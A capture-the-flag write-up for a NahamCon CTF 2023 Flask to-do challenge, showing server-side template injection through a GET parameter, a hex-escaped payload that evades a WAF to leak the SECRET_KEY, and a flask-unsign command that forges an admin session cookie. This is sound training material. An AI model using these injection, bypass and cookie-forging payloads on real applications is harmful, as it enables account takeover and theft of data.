Tags: flask ssti flask-session waf-bypass
Rating: 4.0
# Obligatory [Web]
NahamCon CTF 2023
*Every Capture the Flag competition has to have an obligatory to-do list application, right???*
## Writeup
Sign Up and Login on the Web Application. The website is a Todo-List tracker
data:image/s3,"s3://crabby-images/c3775/c3775c7cb73d7a287f66ab76fc4b67b74612bf2a" alt="todo"
After creating a task, a message `Task created` is printed. The message can also be controlled via the `success` GET parameter
```
http://challenge.nahamcon.com:PORT/?success=Task%20created
```
The parameter is Vulnerable to **SSTI**
data:image/s3,"s3://crabby-images/7783a/7783af07a23e0271046ecd31563ed4d291431d9a" alt="ssti"
```
http://challenge.nahamcon.com:31129/?success={{7*7}}
```
I tried to leak Config items with `{{config.items()}}`, but is blocked by WAF
data:image/s3,"s3://crabby-images/173a7/173a712b1b9f014c0b6e07299a05a3f42c40d6bd" alt=""
Bypassed with `{{self|attr("\x5f\x5fdict\x5f\x5f")}}`
data:image/s3,"s3://crabby-images/02757/02757fe735e312acd87d8a4d578b8e319e1f6a12" alt=""
Now that we got the SECRET_KEY, we can forge our own Flask Session and login as Admin
```bash
flask-unsign --sign --cookie "{'id':1}" --secret ">HN&Ngup3WqNm6q\$5nPGSAoa7SaDuY"
```
data:image/s3,"s3://crabby-images/88a04/88a042f925644adc59d83c291ca09564e08a6924" alt=""
**Flag obtained after using the newly signed auth-token**
data:image/s3,"s3://crabby-images/c6086/c6086bc18717513076a144b20a858caa09f5bda3" alt=""